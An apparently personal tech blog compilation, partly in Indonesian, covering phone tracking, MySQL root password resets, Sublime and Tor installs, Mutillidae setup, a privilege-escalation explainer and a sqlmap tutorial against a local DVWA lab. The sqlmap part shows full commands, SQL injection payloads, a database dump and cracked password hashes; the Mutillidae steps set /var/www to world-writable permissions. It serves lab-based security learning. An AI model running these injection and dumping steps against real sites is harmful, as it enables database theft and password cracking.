Cara Menemukan Hp Android Yang Dicuri / Hilang

Coba hitung berapa di antara kita yang pernah mengalami lupa menaruh Hand Phone? Jawabannya adalah hampir semua pernah mengalaminya.

Ya, Terkadang tertinggal di kantor, di rumah, di mobil, atau di suatu tempat yang kita tidak tahu percisnya. Bersykur kepada Tuhan dan Google sekarang kita tahu Cara Menemukan Hp Android Yang Dicuri / Hilang. 

Bagaimana caranya?

  1. Buka browser atau perambah di komputer lalu login ke google akun (gmail) yang sama dengan hand phone, janga lupa dan pastikan google app di hp sudah diupdate dengan versi terbaru.
  2. Terakhir buka google.com dan ketikan “find mt phone” tanpa tanda kutip.

Tidak lama setelah menekan tombol cari, google akan menampilkan lokasi hp di map dengan akurasi kurang lebih 35 kaki. Untuk mendapatkan lokasi yang lebih baik aktfikan GPS di hp android yang digunakan.

Lalu bagaimana jika tidak tampil lokasi pada map?

Pada bagian bawah map ada tombol RING yang akan membunyikan hp dengan volume maksimal sampai 5 menit. Selain itu juga ada menu untuk mengunci dan menghapus.

Mengatasi ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: NO) di Backtrack 5

1.Stop mysql service:

service mysql stop

2.Start mysql deamon dengan perintah:

mysqld_safe –skip-grant-tables –skip-networking

3.Buka terminal baru dan ketikan mysql untuk di execute:

mysql

4.Masukan password:

UPDATE mysql.user SET password=PASSWORD(‘YOUR_NEW_PASSWORD_HERE’) WHERE user=’root’;

5.Tambahkan privilege, untuk keamanan:

flush privileges;

6.Keluar:

quit;

7.Start kembali mysql service:

service mysql start

How To Install Sublime On Linux

Install via the Package Manager(apt-get):

For Sublime-Text-2:

sudo add-apt-repository ppa:webupd8team/sublime-text-2
sudo apt-get update
sudo apt-get install sublime-text

For Sublime-Text-3:

sudo add-apt-repository ppa:webupd8team/sublime-text-3
sudo apt-get update
sudo apt-get install sublime-text-installer

Source: https://gist.github.com/dantoncancella/4977978

Install Manually via Terminal:

Download from the Sublime Site:

32-bit:

wget http://c758482.r82.cf2.rackcdn.com/Sublime Text 2.0.2.tar.bz2
tar vxjf Sublime Text 2.0.2.tar.bz2

64-bit:

wget http://c758482.r82.cf2.rackcdn.com/Sublime Text 2.0.2 x64.tar.bz2
tar vxjf Sublime Text 2.0.2 x64.tar.bz2

For Both:

 sudo mv Sublime Text 2 /opt/
sudo ln -s /opt/Sublime Text 2/sublime_text /usr/bin/sublime

Source: http://www.tecmint.com/install-sublime-text-editor-in-linux/

Install TOR Ubuntu Based

Need proxy to open blocked website or to hide your IP Address. 😀 Tor can halp you to solve this.

1. Configure repository

add-apt-repository ppa:ubun-tor/ppa

apt-get update && apt-get install tor tor-geoipdb privoxy vidalia 

2. Configure Privoxy

gedit /etc/privoxy/config 
Append the following line : forward-socks5 / 127.0.0.1:9050 .                                                                                    

3. Start the engines

/etc/init.d/privoxy start

/etc/init.d/tor start 

4. Download Torbutton for firefox

https://www.torproject.org/dist/torbutton/torbutton-current.xpi

5. Check if you are using tor in Firefox

    https://check.torproject.org/

    Source

    Extract Database With Sqlmap

    Bismlillah…

    Hello, buddy! have ever think why Oracle Corp will monopolize and commercialize Mysql? While many people already depended on it in their development. You do not need to answer it, seriously. Coz now we aren’t going to talk about that, but we’re gonna talk about how to use Sqlmap to extract database.

    Assumption:

    • You have apache2, mysql, phpmyadmin instaled on your system.
    • I use DVWA for victim site, click here for more information and download link.
    • You have found the vulnerable from DVWA site. Click here for tutorial.
    • I use Mantra and Burp Suite for IG(Information Gathering). Click here for tutorial!. Important to find the cookie.
    Open your teminal and go to sqlmap directory “cd /pentest/database/sqlmap/” or use gnome menu.
    So let’s rock, here’s the step:

    1. First read the manual by typing “./sqlmap -h“.
    2. If you are already knew about the usage, let’s continue. Here’s the syntax “./sqlmap.py -u victim_url –cookie=Cookie –dbs” if the targeted website has login page we have to find the cookie, we can use Burp Suite. But if no, just go to vurnerable webseite immediately “./sqlmap.py -u victim_url  –dbs“. Realize the differences among the the syntaxes, -u” for url and –dbs” for capturing database name. In my case will be like this:

      ./sqlmap.py -u “http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02″ –dbs

    3. Open :

          sqlmap/1.0-dev-25eca9d – automatic SQL injection and database takeover tool
          http://sqlmap.org
      [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
      [*] starting at 17:17:09
      [17:17:10] [INFO] resuming back-end DBMS ‘mysql’ 
      [17:17:10] [INFO] testing connection to the target url
      sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
      Place: GET
      Parameter: id
          Type: boolean-based blind
          Title: AND boolean-based blind – WHERE or HAVING clause
          Payload: id=1′ AND 7478=7478 AND ‘UEwS’=’UEwS&Submit=Submit
          Type: error-based
          Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
          Payload: id=1′ AND (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x3a7977783a,(SELECT (CASE WHEN (9832=9832) THEN 1 ELSE 0 END)),0x3a736b733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘fXTy’=’fXTy&Submit=Submit
          Type: UNION query
          Title: MySQL UNION query (NULL) – 2 columns
          Payload: id=1′ LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7977783a,0x737653766b4c48705746,0x3a736b733a)#&Submit=Submit
          Type: AND/OR time-based blind
          Title: MySQL > 5.0.11 AND time-based blind
          Payload: id=1′ AND SLEEP(5) AND ‘tdry’=’tdry&Submit=Submit
      [17:17:10] [INFO] the back-end DBMS is MySQL
      web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
      web application technology: PHP 5.3.2, Apache 2.2.14
      back-end DBMS: MySQL 5.0
      [17:17:10] [INFO] fetching database names
      [17:17:10] [WARNING] reflective value(s) found and filtering out
      available databases [6]:
      cacti
      [*] dvwa
      [*] information_schema
      [*] mysql
      [*] nowasp
      [*] owasp10
      [17:17:10] [INFO] fetched data logged to text files under ‘/pentest/database/sqlmap/output/localhost’
      [*] shutting down at 17:17:10

      Can you see the databases? Now guess which the related one is. Yeah you are right, dvwa is the one that we are looking for 😀

    4. We got the database name now “dvwa“, the next duty is to get the tables name.
    5. /sqlmap.py -u “http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02″ -D dvwa –tables

      Open :

      sqlmap/1.0-dev-25eca9d – automatic SQL injection and database takeover tool
          http://sqlmap.org

      [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

      [*] starting at 17:37:07

      [17:37:07] [INFO] resuming back-end DBMS ‘mysql’
      [17:37:07] [INFO] testing connection to the target url
      sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

      Place: GET
      Parameter: id
          Type: boolean-based blind
          Title: AND boolean-based blind – WHERE or HAVING clause
          Payload: id=1′ AND 7478=7478 AND ‘UEwS’=’UEwS&Submit=Submit

          Type: error-based
          Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
          Payload: id=1′ AND (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x3a7977783a,(SELECT (CASE WHEN (9832=9832) THEN 1 ELSE 0 END)),0x3a736b733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘fXTy’=’fXTy&Submit=Submit

          Type: UNION query
          Title: MySQL UNION query (NULL) – 2 columns
          Payload: id=1′ LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7977783a,0x737653766b4c48705746,0x3a736b733a)#&Submit=Submit

          Type: AND/OR time-based blind
          Title: MySQL > 5.0.11 AND time-based blind
          Payload: id=1′ AND SLEEP(5) AND ‘tdry’=’tdry&Submit=Submit

      [17:37:08] [INFO] the back-end DBMS is MySQL
      web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
      web application technology: PHP 5.3.2, Apache 2.2.14
      back-end DBMS: MySQL 5.0
      [17:37:08] [INFO] fetching tables for database: ‘dvwa’
      [17:37:08] [WARNING] reflective value(s) found and filtering out
      Database: dvwa
      [2 tables]+———–+
      | guestbook |
      | users     |
      +———–+

      [17:37:08] [INFO] fetched data logged to text files under ‘/pentest/database/sqlmap/output/localhost’

      [*] shutting down at 17:37:08

      Sure, you can see those tables name, nothing left to do just dumping that users table.

    6. Don’t be happy, we still get things to do.
    7. ./sqlmap.py -u “http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02″ -T users –dump

      Open :

         sqlmap/1.0-dev-25eca9d – automatic SQL injection and database takeover tool
          http://sqlmap.org

      [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

      [*] starting at 17:38:00

      [17:38:01] [INFO] resuming back-end DBMS ‘mysql’
      [17:38:01] [INFO] testing connection to the target url
      sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

      Place: GET
      Parameter: id
          Type: boolean-based blind
          Title: AND boolean-based blind – WHERE or HAVING clause
          Payload: id=1′ AND 7478=7478 AND ‘UEwS’=’UEwS&Submit=Submit

          Type: error-based
          Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
          Payload: id=1′ AND (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x3a7977783a,(SELECT (CASE WHEN (9832=9832) THEN 1 ELSE 0 END)),0x3a736b733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘fXTy’=’fXTy&Submit=Submit

          Type: UNION query
          Title: MySQL UNION query (NULL) – 2 columns
          Payload: id=1′ LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7977783a,0x737653766b4c48705746,0x3a736b733a)#&Submit=Submit

          Type: AND/OR time-based blind
          Title: MySQL > 5.0.11 AND time-based blind
          Payload: id=1′ AND SLEEP(5) AND ‘tdry’=’tdry&Submit=Submit

      [17:38:01] [INFO] the back-end DBMS is MySQL
      web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
      web application technology: PHP 5.3.2, Apache 2.2.14
      back-end DBMS: MySQL 5.0
      [17:38:01] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
      [17:38:01] [INFO] fetching current database
      [17:38:01] [WARNING] reflective value(s) found and filtering out
      [17:38:02] [INFO] fetching columns for table ‘users’ in database ‘dvwa’
      [17:38:02] [INFO] fetching entries for table ‘users’ in database ‘dvwa’
      [17:38:02] [INFO] analyzing table dump for possible password hashes
      recognized possible password hashes in column ‘password’. Do you want to crack them via a dictionary-based attack? [Y/n/q] Y

      [17:38:19] [INFO] using hash method ‘md5_generic_passwd’
      what dictionary do you want to use?
      [1] default dictionary file ‘/pentest/database/sqlmap/txt/wordlist.txt’ (press Enter)
      [2] custom dictionary file
      [3] file with list of dictionary files
      > 1

      [17:39:26] [INFO] using default dictionary
      [17:39:26] [INFO] loading dictionary from ‘/pentest/database/sqlmap/txt/wordlist.txt’
      do you want to use common password suffixes? (slow!) [y/N] y

      [17:39:29] [INFO] starting dictionary-based cracking (md5_generic_passwd)
      [17:39:29] [INFO] starting 4 processes
      [17:39:35] [INFO] cracked password ‘abc123’ for user ‘gordonb’              
      [17:39:37] [INFO] cracked password ‘charley’ for user ‘1337’                
      [17:39:42] [INFO] cracked password ‘letmein’ for user ‘pablo’                
      [17:39:45] [INFO] cracked password ‘password’ for user ‘admin’              
      [17:39:50] [INFO] postprocessing table dump                                  
      Database: dvwa
      Table: users
      [5 entries]+———+———+————————————————–+———————————————+———–+————+
      | user_id | user    | avatar                                           | password                                    | last_name | first_name |
      +———+———+————————————————–+———————————————+———–+————+
      | 1       | admin   | http://localhost/dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      |
      | 2       | gordonb | http://localhost/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
      | 3       | 1337    | http://localhost/dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
      | 4       | pablo   | http://localhost/dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
      | 5       | smithy  | http://localhost/dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
      +———+———+————————————————–+———————————————+———–+————+

      [17:39:50] [INFO] table ‘dvwa.users’ dumped to CSV file ‘/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv’
      [17:39:50] [INFO] fetched data logged to text files under ‘/pentest/database/sqlmap/output/localhost’

      [*] shutting down at 17:39:50

      Viola…. the usenames and password appear.. it seems the passwords are encrypted (md5 maybe). Your last duty to solve it 😛

    Cara Mengatasi MySQL Server Error #1045 #2002

    Bismillah… cmiw

    Have you ever installed phpmyadmin and got these errors:

    • #2002 Cannot log in to the MySQL server
    • #1045 Cannot log in to the MySQL server
    Here’s the simple solution, but if you have another way better than this, please write it in comment box 😀
    1. Stop the mysql demon process using this command :
      sudo service mysql stop
    2. Start the mysqld demon process using the –skip-grant-tables option with this command:
      sudo /usr/sbin/mysqld --skip-grant-tables --skip-networking &
    3. Start the mysql client process using this command:
      mysql -u root
    4. From the mysql prompt execute this command to be able to change any password:
      FLUSH PRIVILEGES;
    5. Then reset/update your password and quit:
      SET PASSWORD FOR [email protected]'localhost' = PASSWORD('password');
      quit
    6. Start the mysql demon process using this command :
      sudo service mysql start
    Now, you can log in to MySQL as root user. Try to reopen from your browser!

    How To Install Mutillidae And Try A Little Test

    Bismillah…

    So, bofore we start sharing about Mutillidae. Better for us to know it’s definition. Open the spoiler to read it, but if you aren’t patient enough, just pass it by 😀

    Open:

     

    Mutillidae is a free, open source web application provided to allow security enthusiest to pen-test and hack a web application. Mutillidae can be installed on Linux, Windows XP, and Windows 7 using XAMMP making it easy for users who do not want to install or administrate their own webserver. It is already installed on Samurai WTF. Simply replace existing version with latest on Samurai. Mutillidae contains dozens of vulnerabilities and hints to help the user exploit them; providing an easy-to-use web hacking environment deliberately designed to be used as a hack-lab for security enthusiast, classroom labs, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, in corporate web sec training courses, and as an “assess the assessor” target for vulnerability software.

    Mutillidae has been tested/attacked with Cenzic Hailstorm ARC, W3AF, SQLMAP, Samurai WTF, Backtrack, HP Web Inspect, Burp-Suite, NetSparker Community Edition, and other tools. If you would like to practice pen-testing/hacking a web application by exploiting cross-site scripting, sql injection, response-splitting, html injection, javascript injection, clickjacking, cross frame scripting, forms-caching, authentication bypass, or many other vulnerabilities, then Mutillidae is for you.

    Requirements (1-5):

    1. First we need to install Apache, type this in your terminal:
      sudo apt-get install apache2
    2. Then install PHP:
      sudo apt-get install php5 libapache2-mod-php5
    3. Install the MYSQL server:
      sudo apt-get install mysql-server
    4. After that it should prompt you to setup the password for your Mysql server. In my case, I put ‘roo’ as my password just for demo purposes really although it’s not really advisable to use a weak password in a live server. Now setup your phpmyadmin (Optional):
      sudo apt-get install libapache2-mod-auth-mysql php5-mysql phpmyadmin
    5. Change the permission of your /var/www folder to make sure you will have all the rights to read, write and execute files by typing this command in your terminal:
      sudo chmod -R 0777 /var/www
    6. To check if the installation is successful navigate through this link in your browser: http://localhost/ or http://127.0.0.1/If you see something that says ‘It Works!’ then you are done setting up your LAMP server. Now time to install Mutillidae! Download and extract Mutillidae in the /var/www directory:
      =>Download mutillidae here
      =>Extract to www directory, you can copas it or open terminal and type “unzip /home/name_user/Download/LATEST-mutillidae-2.3.7.zip” then “copy -r /home/name_user/Download/mutillidae/ /var/www/“.
    7. Next up we need to configure the config.inc and MySQLHandler.php which contains the dbhost, dbuser, dppass, and dbname configurations:
      Use your fav editor “gedit /var/www/mutillidae/config.inc
      $dbhost = ‘localhost’;
      $dbuser = ‘root;      
      $dbpass = ‘root’;
      $dbname = ‘nowasp’;       —you must create it, open your browser localhost/phpmyadmin—
      When you are done next type “gedit /var/www/mutillidae/classes/MySQLHandler.php
      and do the same steps as above.
    8. By default the value $dbpass is left blank so we need to put the root password for Mysql which you entered during the installation of mysql-server. In my case I put root.
    9. Make sure you have already started the services for Mysql and Apache but if not you can just type these commands in the terminal:
      service mysql start && service apache2 start
    10. Then open your web browser again and point it to 127.0.0.1/mutillidae/ or localhost/mutillidae/. Next, let’s have the web application setup the database automatically by clicking Core Controls > Setup/Reset the DB at the left side or Setup/Reset the DB at the upperight corner.

    How To Pen-Test Sytem [Based On Linux Server]

    Bismillah…

    The mentor said that “The important things in security testing or auditing is to follow the Hacking Phase orderly and completely”.

    Hasking Phase
    First=>Information Gathering=>Service Enumeration=>Vulnerability Assessment=>Exploit=>Repeat till success. If so, then Second=>Backdooring=>Maintaining Access=>House Keeping=>End.
    In this article I’m gonna share (The Pyramid) step plainly

    Privilege Escalation

    Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.

    Most computer systems are designed for use with multiple users. Privileges mean what a user is permitted to do. Common privileges including viewing and editing files, or modifying system files.

    Privilege escalation means a user receives privileges they are not entitled to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. It usually occurs when a system has a bug that allows security to be bypassed or, alternatively, has flawed design assumptions about how it will be used. Privilege escalation occurs in two forms:

    • Vertical privilege escalation, also known as privilege elevation, where a lower privilege user or application accesses functions or content reserved for higher privilege users or applications. This type of privilege escalation occurs when the user or process is able to obtain a higher level of access than an administrator or system developer intended, possibly by performing kernel-level operations. Examples:
      1. In certain versions of the Linux kernel it was possible to write a program that would set its current directory to /etc/cron.d, request that a core dump be performed in case it crashes and then have itself killed by another process. The core dump file would have been placed at the program’s current directory, that is, /etc/cron.d, and cron would have treated it as a text file instructing it to run programs on schedule. Because the contents of the file would be under attacker’s control, the attacker would be able to execute any program with root privileges.
      2. Cross Zone Scripting is a type of privilege escalation attack in which a website subverts the security model of web browsers so that it can run malicious code on client computers.
      3. Some versions of the iPhone allow an unauthorised user to access the phone while it is locked.
      4. Internet Banking users can access site administrative functions or the password for a smartphone can be bypassed.
    • Horizontal privilege escalation, where a normal user accesses functions or content reserved for other normal users. Horizontal privilege escalation occurs when an application allows the attacker to gain access to resources which normally would have been protected from an application or user. The result is that the application performs actions with the same but different security context than intended by the application developer or system administrator; this is effectively a limited form of privilege escalation (specifically, the unauthorized assumption of the capability of impersonating other users). Examples:
      1. User A has access to his/her bank account in an Internet Banking application.
      2. User B has access to his/her bank account in the same Internet Banking application.
      3. The vulnerability occurs when User A is able to access User B’s bank account by performing some sort of malicious activity.
      4. This malicious activity may be possible due to common web application weaknesses or vulnerabilities.

    Source : Wikipedia.com